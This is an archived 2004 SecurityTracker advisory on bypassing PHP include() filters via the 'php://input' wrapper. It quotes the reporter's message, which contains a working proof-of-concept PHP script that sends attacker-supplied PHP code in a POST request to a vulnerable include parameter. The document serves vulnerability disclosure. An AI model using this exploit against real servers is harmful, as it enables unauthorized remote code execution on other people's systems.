SecurityTracker.com Archives - PHP 'php://input' Command May Let Remote Users Bypass Include Filters to Include Remote Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Php

Vendors: PHP Group

PHP 'php://input' Command May Let Remote Users Bypass Include Filters to Include Remote Code

SecurityTracker Alert ID: 1010326

SecurityTracker URL: http://securitytracker.com/id?1010326

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: May 28 2004

Impact: Host/resource access via network, Modification of user information

Exploit Included: Yes

Version(s): 3.0.13 and later versions

Description: A vulnerability was reported in PHP. A remote user may be able to bypass include file filters.

Himeur Nourredine reported that a remote user may be able to bypass filters that parse for the 'http://' or 'ftp://' strings by using the 'php://input' URL and sending PHP code in a POST request.

The 'php://input' stream by design allows access to raw POST data.

A demonstration exploit is provided in the Source Message.

The report credits Slythers with discovering this flaw.

Impact: A user may be able to bypass include file filtering restrictions.

Solution: No solution was available at the time of this entry.

Vendor URL: www.php.net/ (Links to External Site)

Cause: Access control error, Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Himeur Nourredine <lostnoobs@security-challenge.com>

Message History: None.

Source Message Contents

Date: 27 May 2004 09:07:15 -0000
From: Himeur Nourredine <lostnoobs@security-challenge.com>
Subject: [PHP] include() bypassing filter with php://input

 



Informations : 
°°°°°°°°°°°°°° 
Website : http://www.php.net
Version : PHP 3.0.13 =>
Problem : Inlude() bypassing filter


Proof of concept:
°°°°°°°° Exploit °°°°°°°°°
<------------ cut here ---------------->
<form action="" methode="post" >
target server : <input type="text" name="server" ><br>
file : <input type="text" name="file" ><br>
exec : <input type="text" name="cmd" ><br>
<INPUT type="submit" value="send">
</form>

<?
if($cmd){
$message  = "POST /".$file."php://input HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwav
e-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen( $cmd )."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
 
fclose($fd);
 
?>
<------------ cut here ---------------->

target server = "www.exemple.com"
file = "index.php?page="
exec = "<? phpinfo(); ?>"

Explaination
°°°°°°°°°°°°°°
You can bypassing filter protection who parse http:// or ftp:// ...
"php://input" allows to put data in the function include() by sending a request with code p
hp in POST methode.  


For More details : 
°°°°°°°°°°°°°° 
http://fr2.php.net/manual/en/wrappers.php.php
irc.fr.worldnet.net #s-c

Nourredine Himeur

www.security-challenge.com

This vulnerability was found by Slythers but he's too shy for publish the vuln ;)

greetz : mum , daddy , tcpteam , Nyx

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2004, SecurityGlobal.net LLC